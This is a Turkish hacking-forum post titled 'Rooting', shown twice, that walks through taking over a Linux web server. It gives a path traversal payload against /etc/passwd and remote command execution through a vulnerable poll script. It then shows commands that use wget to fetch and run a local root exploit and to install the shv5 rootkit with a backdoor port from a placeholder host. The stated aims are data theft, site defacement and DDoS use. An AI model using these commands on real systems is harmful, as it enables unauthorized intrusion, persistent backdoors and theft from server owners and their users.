Rooting - Linux- Zamansız Tartışma Platform

RAMSES113 · 17-02-07, 12:33 Çevrimdışı

Bilindiği üzere linux i$letim sistemi çok fazla güvenlik önlemleri olan ve hacklenmesi zor bir sistemdir (not: adminine göre deği$ir) neyse konumuza dönelim senaryoları gözden geçirelim
1.senaryo:
iyi bir siteniz var ve insanlar sürekli forumunuza kayıt oluyor ve sisteme çok güveniyorsunuz ve sitenizdende insanlar alı$veri$ yapıyor bir gün geliyorki kullandığınız forum da bir açık bulunmu$ mesela
/index.php?page=../../../../../../../../../../etc/passwd
gibi
yada
------------------------
[hide]http://php.svbo.net/pollvote/pollvot....xxx/uname.txt[/hide]
ekrana bakıyorsunuz birde ne görüyorsunuz?

Linux srv04 2.4.24 #2 SMP Tue Feb 10 01:00:24 PST 2004 i686 GNU/Linux Poll beëindigd! Eén punt heeft Stemmen

Aantal Stemmen: 0

------------
acaba uname.txt içinde ne var aslında çok basit
cat uname.txt

bu kadarlık bir komut yani serverın komutlarını kullanabildiğimiz bir komut bununla ne yapabiliriz??
mesela bindsh*ll kurabiliriz sisteme mesela perl de yazılmı$ bindsh*ll kura biliriz sisteme giren kötü niyetli adam siteye index atabilir yada sisteme istediği şeyi yapar...

senaryo 2:
şimdi elimizde remote exploitle sisteme dü$tüğümüz bir sistem var diyelim
-------------
sh-2.05b$ ls
ls
bin boot dev etc home lib mnt proc root sbin sys tmp usr var
sh-2.05b$
sh-2.05b$
sonra sh-2.05b ifadesinin önünde $ işareti var bu bizim root olmadığımız anlamında whoami komutuyla da bunu görebiliriz şimdi sitemimize göz atalım ve local r00t exploit aramak (yada yazmak) en mantıklısı local r00t exploitimizi sisteme wget ile çekelim...
sh-2.05b$wget www.xxxx.xxx/local/root;chmod 777 root;./root;
wget www.xxxx.xxx/local/root;chmod 777 root;./root;
sh-2.05b#
evet şimdi mutlu son ancak sistemi neden rootladık sistemdeki bilgileri çalmak için yada hostaki sitelere index atmak için mi yoksa sisteme r00tkit kurup daha sonra kullanacağımız ddos attacklarda kullanmak için mi??
biz en iyisi r00tkit kuralım
sh-2.05b#
sh-2.05b#wget www.xxxx.xxx/shv5.tgz;tar -zxvf shv5.tgz;cd shv5;./setup hacked 30059;
wget www.xxxx.xxx/shv5.tgz;tar -zxvf shv5.tgz;cd shv5;./setup hacked 30059;
:::::::::
.........
.........
.........
sh-2.05b#
sh-2.05b#
r00tkitimizi de kurduk şimdi kendi açtığımız bindsh*ll i kapatıp sistem den çıkalım
sh-2.05b#kill -9 xxxx
kill -9 xxxx
sh-2.05b#
sh-2.05b#exit
exit
sh-2.05b$exit
exit
-------------
çıktık evet birdaha sisteme girerken remote yada sistemi rootlamak için local remote exploitle kasmamıza gerek yok sadece rootkit kurduğumuz sistemin adresini ve portu hatırlamak yeter

17-02-07, 12:33 Çevrimdışı	#1
Dekan RAMSES113 Genç Kuvvet Genel Mesajlar: 5.240 Teşekkür etti: 3.846 Teşekkür edildi: 3.353 RepForum Gücü: 63 Forum Puanı:20353 Ruhsal Durumum:	Rooting Bilindiği üzere linux i$letim sistemi çok fazla güvenlik önlemleri olan ve hacklenmesi zor bir sistemdir (not: adminine göre deği$ir) neyse konumuza dönelim senaryoları gözden geçirelim 1.senaryo: iyi bir siteniz var ve insanlar sürekli forumunuza kayıt oluyor ve sisteme çok güveniyorsunuz ve sitenizdende insanlar alı$veri$ yapıyor bir gün geliyorki kullandığınız forum da bir açık bulunmu$ mesela /index.php?page=../../../../../../../../../../etc/passwd gibi yada ------------------------ [hide]http://php.svbo.net/pollvote/pollvot....xxx/uname.txt[/hide] ekrana bakıyorsunuz birde ne görüyorsunuz? Linux srv04 2.4.24 #2 SMP Tue Feb 10 01:00:24 PST 2004 i686 GNU/Linux Poll beëindigd! Eén punt heeft Stemmen Aantal Stemmen: 0 ------------ acaba uname.txt içinde ne var aslında çok basit cat uname.txt bu kadarlık bir komut yani serverın komutlarını kullanabildiğimiz bir komut bununla ne yapabiliriz?? mesela bindshll kurabiliriz sisteme mesela perl de yazılmı$ bindshll kura biliriz sisteme giren kötü niyetli adam siteye index atabilir yada sisteme istediği şeyi yapar... senaryo 2: şimdi elimizde remote exploitle sisteme dü$tüğümüz bir sistem var diyelim ------------- sh-2.05b$ ls ls bin boot dev etc home lib mnt proc root sbin sys tmp usr var sh-2.05b$ sh-2.05b$ sonra sh-2.05b ifadesinin önünde $ işareti var bu bizim root olmadığımız anlamında whoami komutuyla da bunu görebiliriz şimdi sitemimize göz atalım ve local r00t exploit aramak (yada yazmak) en mantıklısı local r00t exploitimizi sisteme wget ile çekelim... sh-2.05b$wget www.xxxx.xxx/local/root;chmod 777 root;./root; wget www.xxxx.xxx/local/root;chmod 777 root;./root; sh-2.05b# evet şimdi mutlu son ancak sistemi neden rootladık sistemdeki bilgileri çalmak için yada hostaki sitelere index atmak için mi yoksa sisteme r00tkit kurup daha sonra kullanacağımız ddos attacklarda kullanmak için mi?? biz en iyisi r00tkit kuralım sh-2.05b# sh-2.05b#wget www.xxxx.xxx/shv5.tgz;tar -zxvf shv5.tgz;cd shv5;./setup hacked 30059; wget www.xxxx.xxx/shv5.tgz;tar -zxvf shv5.tgz;cd shv5;./setup hacked 30059; ::::::::: ......... ......... ......... sh-2.05b# sh-2.05b# r00tkitimizi de kurduk şimdi kendi açtığımız bindshll i kapatıp sistem den çıkalım sh-2.05b#kill -9 xxxx kill -9 xxxx sh-2.05b# sh-2.05b#exit exit sh-2.05b$exit exit ------------- çıktık evet birdaha sisteme girerken remote yada sistemi rootlamak için local remote exploitle kasmamıza gerek yok sadece rootkit kurduğumuz sistemin adresini ve portu hatırlamak yeter Kendini Yeterli Görmeme Bir Fazilet İfadesidir... "Hakikat Damlaları"*

Konu Seçenekleri
Yazdırılabilir Sümü Göster Sayfayı E-Mail'le gönder